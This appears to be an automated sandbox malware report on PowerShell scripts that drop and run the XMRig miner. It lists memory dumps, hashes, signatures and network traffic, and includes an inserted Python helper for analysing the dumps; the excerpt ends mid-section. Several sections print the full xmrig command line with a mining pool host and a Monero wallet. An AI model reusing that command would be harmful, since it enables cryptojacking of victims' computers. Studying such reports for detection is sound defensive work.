SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/1724-10-0x0000020B719F0000-0x0000020B71A12000-memory.dmp

memory/1724-11-0x00007FFB22490000-0x00007FFB22F51000-memory.dmp

memory/1724-12-0x00007FFB22490000-0x00007FFB22F51000-memory.dmp

memory/1724-14-0x00007FFB22490000-0x00007FFB22F51000-memory.dmp

memory/1724-16-0x0000020B71A60000-0x0000020B71A6A000-memory.dmp

memory/1724-15-0x0000020B71DE0000-0x0000020B71DF2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/2660-47-0x000001FE2B300000-0x000001FE2B320000-memory.dmp

memory/2660-48-0x000001FE2CC00000-0x000001FE2CC20000-memory.dmp

memory/2660-49-0x00007FF606D60000-0x00007FF607993000-memory.dmp

memory/2660-50-0x000001FE2CC20000-0x000001FE2CC40000-memory.dmp

memory/1724-51-0x00007FFB22493000-0x00007FFB22495000-memory.dmp

memory/1724-52-0x00007FFB22490000-0x00007FFB22F51000-memory.dmp

memory/2660-53-0x000001FE2CC40000-0x000001FE2CC60000-memory.dmp

memory/2660-54-0x00007FF606D60000-0x00007FF607993000-memory.dmp

memory/1724-55-0x00007FFB22490000-0x00007FFB22F51000-memory.dmp

memory/2660-56-0x00007FF606D60000-0x00007FF607993000-memory.dmp

memory/2660-58-0x000001FE2CC20000-0x000001FE2CC40000-memory.dmp

memory/2660-57-0x00007FF606D60000-0x00007FF607993000-memory.dmp

memory/2660-59-0x000001FE2CC40000-0x000001FE2CC60000-memory.dmp

memory/2660-60-0x00007FF606D60000-0x00007FF607993000-memory.dmp

memory/2660-61-0x00007FF606D60000-0x00007FF607993000-memory.dmp

memory/2660-62-0x00007FF606D60000-0x00007FF607993000-memory.dmp

memory/2660-63-0x00007FF606D60000-0x00007FF607993000-memory.dmp

memory/2660-64-0x00007FF606D60000-0x00007FF607993000-memory.dmp

memory/2660-65-0x00007FF606D60000-0x00007FF607993000-memory.dmp

memory/2660-66-0x00007FF606D60000-0x00007FF607993000-memory.dmp

memory/2660-67-0x00007FF606D60000-0x00007FF607993000-memory.dmp

memory/2660-68-0x00007FF606D60000-0x00007FF607993000-memory.dmp

memory/2660-69-0x00007FF606D60000-0x00007FF607993000-memory.dmp

memory/2660-70-0x00007FF606D60000-0x00007FF607993000-memory.dmp

memory/2660-71-0x00007FF606D60000-0x00007FF607993000-memory.dmp

memory/2660-72-0x00007FF606D60000-0x00007FF607993000-memory.dmp

memory/2660-73-0x00007FF606D60000-0x00007FF607993000-memory.dmp

memory/2660-74-0x00007FF606D60000-0x00007FF607993000-memory.dmp

memory/2660-75-0x00007FF606D60000-0x00007FF607993000-memory.dmp

memory/2660-76-0x00007FF606D60000-0x00007FF607993000-memory.dmp

memory/2660-77-0x00007FF606D60000-0x00007FF607993000-memory.dmp

memory/2660-78-0x00007FF606D60000-0x00007FF607993000-memory.dmp

memory/2660-79-0x00007FF606D60000-0x00007FF607993000-memory.dmp

memory/2660-80-0x00007FF606D60000-0x00007FF607993000-memory.dmp

memory/2660-81-0x00007FF606D60000-0x00007FF607993000-memory.dmp

memory/2660-82-0x00007FF606D60000-0x00007FF607993000-memory.dmp

memory/2660-83-0x00007FF606D60000-0x00007FF607993000-memory.dmp

memory/2660-84-0x00007FF606D60000-0x00007FF607993000-memory.dmp

memory/2660-85-0x00007FF606D60000-0x00007FF607993000-memory.dmp

memory/2660-86-0x00007FF606D60000-0x00007FF607993000-memory.dmp

memory/2660-87-0x00007FF606D60000-0x00007FF607993000-memory.dmp

memory/2660-88-0x00007FF606D60000-0x00007FF607993000-memory.dmp

memory/2660-89-0x00007FF606D60000-0x00007FF607993000-memory.dmp

memory/2660-90-0x00007FF606D60000-0x00007FF607993000-memory.dmp

memory/2660-91-0x00007FF606D60000-0x00007FF607993000-memory.dmp

memory/2660-92-0x00007FF606D60000-0x00007FF607993000-memory.dmp

memory/2660-93-0x00007FF606D60000-0x00007FF607993000-memory.dmp

memory/2660-94-0x00007FF606D60000-0x00007FF607993000-memory.dmp

memory/2660-95-0x00007FF606D60000-0x00007FF607993000-memory.dmp

memory/2660-96-0x00007FF606D60000-0x00007FF607993000-memory.dmp

memory/2660-97-0x00007FF606D60000-0x00007FF607993000-memory.dmp

memory/2660-98-0x00007FF606D60000-0x00007FF607993000-memory.dmp

memory/2660-99-0x00007FF606D60000-0x00007FF607993000-memory.dmp

memory/2660-100-0x00007FF606D60000-0x00007FF607993000-memory.dmp

memory/2660-101-0x00007FF606D60000-0x00007FF607993000-memory.dmp

memory/2660-102-0x00007FF606D60000-0x00007FF607993000-memory.dmp

memory/2660-103-0x00007FF606D60000-0x00007FF607993000-memory.dmp

memory/2660-104-0x00007FF606D60000-0x00007FF607993000-memory.dmp

memory/2660-105-0x00007FF606D60000-0x00007FF607993000-memory.dmp

memory/2660-106-0x00007FF606D60000-0x00007FF607993000-memory.dmp

memory/2660-107-0x00007FF606D60000-0x00007FF607993000-memory.dmp

memory/2660-108-0x00007FF606D60000-0x00007FF607993000-memory.dmp

memory/2660-109-0x00007FF606D60000-0x00007FF607993000-memory.dmp

memory/2660-110-0x00007FF606D60000-0x00007FF607993000-memory.dmp

memory/2660-111-0x00007FF606D60000-0x00007FF607993000-memory.dmp

memory/2660-112-0x00007FF606D60000-0x00007FF607993000-memory.dmp

memory/2660-113-0x00007FF606D60000-0x00007FF607993000-memory.dmp

memory/2660-114-0x00007FF606D60000-0x00007FF607993000-memory.dmp

memory/2660-115-0x00007FF606D60000-0x00007FF607993000-memory.dmp

memory/2660-116-0x00007FF606D60000-0x00007FF607993000-memory.dmp

memory/2660-117-0x00007FF606D60000-0x00007FF607993000-memory.dmp

memory/2660-118-0x00007FF606D60000-0x00007FF607993000-memory.dmp
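
The memory-dump names above encode the PID, a sequence number and the region's start and end address. Added example (not part of the report or of any sandbox tooling): a Python helper that parses those names, groups them by process and region, and reports region sizes that recur in several processes. The dump names embedded in it are copied from the analyses on this page (one or two per PID); the function names and the two-process threshold are this example's own assumptions. Run over those names it finds a 0xC33000-byte region in five different PIDs across the detonations (3500, 4820, 2660, 3092, 1020), each at a different base, which is consistent with the same executable image relocated by ASLR, while the 0x9EC000 region of PID 3660 (the powershell.exe process in behavioral13) appears only once.

```python
"""Group sandbox memory-dump names by process and region to spot the same
image mapped at different ASLR bases across detonations.

Added example; not part of the report or of any sandbox tooling. The dump
names in SAMPLE_DUMPS are copied from this page (one or two per process);
the grouping logic, function names and threshold are this example's own.
"""
import re
from collections import defaultdict

# Constructed sample: dump names taken from several detonations on this page.
SAMPLE_DUMPS = [
    "memory/3500-132-0x00007FF7191D0000-0x00007FF719E03000-memory.dmp",
    "memory/3500-157-0x00007FF7191D0000-0x00007FF719E03000-memory.dmp",
    "memory/4820-90-0x00000225B2110000-0x00000225B2130000-memory.dmp",
    "memory/4820-92-0x00007FF772B20000-0x00007FF773753000-memory.dmp",
    "memory/2660-47-0x000001FE2B300000-0x000001FE2B320000-memory.dmp",
    "memory/2660-49-0x00007FF606D60000-0x00007FF607993000-memory.dmp",
    "memory/3092-91-0x00007FF6ECCA0000-0x00007FF6ED8D3000-memory.dmp",
    "memory/1020-94-0x00007FF7E3740000-0x00007FF7E4373000-memory.dmp",
    "memory/3660-8-0x00007FFAB4820000-0x00007FFAB520C000-memory.dmp",
]

# memory/<pid>-<seq>-0x<start>-0x<end>-memory.dmp
DUMP_RE = re.compile(
    r"^memory/(?P<pid>\d+)-(?P<seq>\d+)-0x(?P<start>[0-9A-Fa-f]+)"
    r"-0x(?P<end>[0-9A-Fa-f]+)-memory\.dmp$"
)


def parse_dump(name):
    """Return (pid, seq, start, end) for a dump name, or None if it does not match."""
    m = DUMP_RE.match(name)
    if not m:
        return None
    return (int(m["pid"]), int(m["seq"]), int(m["start"], 16), int(m["end"], 16))


def regions_by_pid(names):
    """{pid: {(start, end): [seq, ...]}} over all parseable names."""
    out = defaultdict(lambda: defaultdict(list))
    for name in names:
        parsed = parse_dump(name)
        if parsed:
            pid, seq, start, end = parsed
            out[pid][(start, end)].append(seq)
    return out


def regions_of_size(names, size):
    """Map pid -> base address of the region in that process whose length is `size`."""
    hits = {}
    for pid, regions in regions_by_pid(names).items():
        for (start, end) in regions:
            if end - start == size:
                hits[pid] = start
    return hits


def shared_region_sizes(names, min_pids=2):
    """Region sizes seen in at least `min_pids` distinct processes.

    A size repeated across PIDs at different bases is a useful pivot: it is
    the same module relocated by ASLR, here the dropped miner image."""
    pids_per_size = defaultdict(set)
    for pid, regions in regions_by_pid(names).items():
        for (start, end) in regions:
            pids_per_size[end - start].add(pid)
    return {size: sorted(pids) for size, pids in pids_per_size.items()
            if len(pids) >= min_pids}


if __name__ == "__main__":
    for size, pids in sorted(shared_region_sizes(SAMPLE_DUMPS).items()):
        print(f"0x{size:X} bytes in PIDs {pids}")
        for pid, base in sorted(regions_of_size(SAMPLE_DUMPS, size).items()):
            print(f"  pid {pid}: base 0x{base:016X}")
```

The sequence numbers are kept per region so that a run such as 3500-132 through 3500-157 (the same region dumped 26 times) collapses to one entry with its list of snapshots, rather than being counted as 26 distinct regions.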

Analysis: behavioral17

Detonation Overview

Submitted 2024-05-22 20:05
Reported 2024-05-22 20:36
Platform win10-20240404-en
Max time kernel 1797s
Max time network 1758s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (6).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A (64 rows in the report, every field N/A; the match is on the memory dumps listed under Files)

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (6).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 31.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 77.239.69.13.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp

Files

memory/1368-4-0x00007FFCC1FD0000-0x00007FFCC21AB000-memory.dmp

memory/1368-5-0x00007FFCC1FD0000-0x00007FFCC21AB000-memory.dmp

memory/1368-6-0x00007FFCC1FD0000-0x00007FFCC21AB000-memory.dmp

memory/1368-7-0x00000230474F0000-0x0000023047512000-memory.dmp

memory/1368-10-0x00000230477E0000-0x0000023047856000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ta34h5uo.kre.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/1368-25-0x00007FFCC1FD0000-0x00007FFCC21AB000-memory.dmp

memory/1368-61-0x0000023047590000-0x000002304759A000-memory.dmp

memory/1368-48-0x00000230475A0000-0x00000230475B2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/3092-90-0x0000019624220000-0x0000019624240000-memory.dmp

memory/3092-91-0x00007FF6ECCA0000-0x00007FF6ED8D3000-memory.dmp

memory/3092-92-0x00007FF6ECCA0000-0x00007FF6ED8D3000-memory.dmp

memory/1368-93-0x00007FFCC1FD0000-0x00007FFCC21AB000-memory.dmp

memory/1368-94-0x00007FFCC1FD0000-0x00007FFCC21AB000-memory.dmp

memory/1368-95-0x00007FFCC1FD0000-0x00007FFCC21AB000-memory.dmp

memory/3092-96-0x00007FF6ECCA0000-0x00007FF6ED8D3000-memory.dmp

memory/3092-97-0x00007FF6ECCA0000-0x00007FF6ED8D3000-memory.dmp

memory/3092-98-0x00007FF6ECCA0000-0x00007FF6ED8D3000-memory.dmp

memory/3092-99-0x00007FF6ECCA0000-0x00007FF6ED8D3000-memory.dmp

memory/3092-100-0x00007FF6ECCA0000-0x00007FF6ED8D3000-memory.dmp

memory/3092-101-0x00007FF6ECCA0000-0x00007FF6ED8D3000-memory.dmp

memory/3092-102-0x00007FF6ECCA0000-0x00007FF6ED8D3000-memory.dmp

memory/3092-103-0x00007FF6ECCA0000-0x00007FF6ED8D3000-memory.dmp

memory/3092-104-0x00007FF6ECCA0000-0x00007FF6ED8D3000-memory.dmp

memory/3092-105-0x00007FF6ECCA0000-0x00007FF6ED8D3000-memory.dmp

memory/3092-106-0x00007FF6ECCA0000-0x00007FF6ED8D3000-memory.dmp

memory/3092-107-0x00007FF6ECCA0000-0x00007FF6ED8D3000-memory.dmp

memory/3092-108-0x00007FF6ECCA0000-0x00007FF6ED8D3000-memory.dmp

memory/3092-109-0x00007FF6ECCA0000-0x00007FF6ED8D3000-memory.dmp

memory/3092-110-0x00007FF6ECCA0000-0x00007FF6ED8D3000-memory.dmp

memory/3092-111-0x00007FF6ECCA0000-0x00007FF6ED8D3000-memory.dmp

memory/3092-112-0x00007FF6ECCA0000-0x00007FF6ED8D3000-memory.dmp

memory/3092-113-0x00007FF6ECCA0000-0x00007FF6ED8D3000-memory.dmp

memory/3092-114-0x00007FF6ECCA0000-0x00007FF6ED8D3000-memory.dmp

memory/3092-115-0x00007FF6ECCA0000-0x00007FF6ED8D3000-memory.dmp

memory/3092-116-0x00007FF6ECCA0000-0x00007FF6ED8D3000-memory.dmp

memory/3092-117-0x00007FF6ECCA0000-0x00007FF6ED8D3000-memory.dmp

memory/3092-118-0x00007FF6ECCA0000-0x00007FF6ED8D3000-memory.dmp

memory/3092-119-0x00007FF6ECCA0000-0x00007FF6ED8D3000-memory.dmp

memory/3092-120-0x00007FF6ECCA0000-0x00007FF6ED8D3000-memory.dmp

memory/3092-121-0x00007FF6ECCA0000-0x00007FF6ED8D3000-memory.dmp

memory/3092-122-0x00007FF6ECCA0000-0x00007FF6ED8D3000-memory.dmp

memory/3092-123-0x00007FF6ECCA0000-0x00007FF6ED8D3000-memory.dmp

memory/3092-124-0x00007FF6ECCA0000-0x00007FF6ED8D3000-memory.dmp

memory/3092-125-0x00007FF6ECCA0000-0x00007FF6ED8D3000-memory.dmp

memory/3092-126-0x00007FF6ECCA0000-0x00007FF6ED8D3000-memory.dmp

memory/3092-127-0x00007FF6ECCA0000-0x00007FF6ED8D3000-memory.dmp

memory/3092-128-0x00007FF6ECCA0000-0x00007FF6ED8D3000-memory.dmp

memory/3092-129-0x00007FF6ECCA0000-0x00007FF6ED8D3000-memory.dmp

memory/3092-130-0x00007FF6ECCA0000-0x00007FF6ED8D3000-memory.dmp

memory/3092-131-0x00007FF6ECCA0000-0x00007FF6ED8D3000-memory.dmp

memory/3092-132-0x00007FF6ECCA0000-0x00007FF6ED8D3000-memory.dmp

memory/3092-133-0x00007FF6ECCA0000-0x00007FF6ED8D3000-memory.dmp

memory/3092-134-0x00007FF6ECCA0000-0x00007FF6ED8D3000-memory.dmp

memory/3092-135-0x00007FF6ECCA0000-0x00007FF6ED8D3000-memory.dmp

memory/3092-136-0x00007FF6ECCA0000-0x00007FF6ED8D3000-memory.dmp

memory/3092-137-0x00007FF6ECCA0000-0x00007FF6ED8D3000-memory.dmp

memory/3092-138-0x00007FF6ECCA0000-0x00007FF6ED8D3000-memory.dmp

memory/3092-139-0x00007FF6ECCA0000-0x00007FF6ED8D3000-memory.dmp

memory/3092-140-0x00007FF6ECCA0000-0x00007FF6ED8D3000-memory.dmp

memory/3092-141-0x00007FF6ECCA0000-0x00007FF6ED8D3000-memory.dmp

memory/3092-142-0x00007FF6ECCA0000-0x00007FF6ED8D3000-memory.dmp

memory/3092-143-0x00007FF6ECCA0000-0x00007FF6ED8D3000-memory.dmp

memory/3092-144-0x00007FF6ECCA0000-0x00007FF6ED8D3000-memory.dmp

memory/3092-145-0x00007FF6ECCA0000-0x00007FF6ED8D3000-memory.dmp

memory/3092-146-0x00007FF6ECCA0000-0x00007FF6ED8D3000-memory.dmp

memory/3092-147-0x00007FF6ECCA0000-0x00007FF6ED8D3000-memory.dmp

memory/3092-148-0x00007FF6ECCA0000-0x00007FF6ED8D3000-memory.dmp

memory/3092-149-0x00007FF6ECCA0000-0x00007FF6ED8D3000-memory.dmp

memory/3092-150-0x00007FF6ECCA0000-0x00007FF6ED8D3000-memory.dmp

memory/3092-151-0x00007FF6ECCA0000-0x00007FF6ED8D3000-memory.dmp

memory/3092-152-0x00007FF6ECCA0000-0x00007FF6ED8D3000-memory.dmp

memory/3092-153-0x00007FF6ECCA0000-0x00007FF6ED8D3000-memory.dmp

memory/3092-154-0x00007FF6ECCA0000-0x00007FF6ED8D3000-memory.dmp

memory/3092-155-0x00007FF6ECCA0000-0x00007FF6ED8D3000-memory.dmp

memory/3092-156-0x00007FF6ECCA0000-0x00007FF6ED8D3000-memory.dmp

Analysis: behavioral5

Detonation Overview

Submitted 2024-05-22 20:05
Reported 2024-05-22 20:36
Platform win10-20240404-en
Max time kernel 1798s
Max time network 1778s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (3).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A (64 rows in the report, every field N/A; the match is on the memory dumps listed under Files)

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (3).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.109.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.109.199.185.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 2.173.189.20.in-addr.arpa udp
US 8.8.8.8:53 145.83.221.88.in-addr.arpa udp

Files

memory/3508-2-0x00007FF992773000-0x00007FF992774000-memory.dmp

memory/3508-5-0x000001E4DA2F0000-0x000001E4DA312000-memory.dmp

memory/3508-6-0x00007FF992770000-0x00007FF99315C000-memory.dmp

memory/3508-9-0x00007FF992770000-0x00007FF99315C000-memory.dmp

memory/3508-10-0x000001E4F2970000-0x000001E4F29E6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_s4a0ni32.qpb.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

Analysis: behavioral9

Detonation Overview

Submitted

2024-05-22 20:05

Reported

2024-05-22 20:36

Platform

win10v2004-20240426-en

Max time kernel

1793s

Max time network

1777s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (4).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (4).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.110.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 8.8.8.8:53 133.110.199.185.in-addr.arpa udp
US 204.79.197.237:443 g.bing.com tcp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 100.58.20.217.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 73.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
US 8.8.8.8:53 26.35.223.20.in-addr.arpa udp
NL 23.62.61.73:443 www.bing.com tcp
US 8.8.8.8:53 73.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 149.220.183.52.in-addr.arpa udp
US 8.8.8.8:53 103.169.127.40.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 129.83.221.88.in-addr.arpa udp
US 8.8.8.8:53 194.98.74.40.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_nt1b0fre.usu.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

Analysis: behavioral16

Detonation Overview

Submitted

2024-05-22 20:05

Reported

2024-05-22 20:36

Platform

win11-20240426-en

Max time kernel

1791s

Max time network

1761s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (5).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
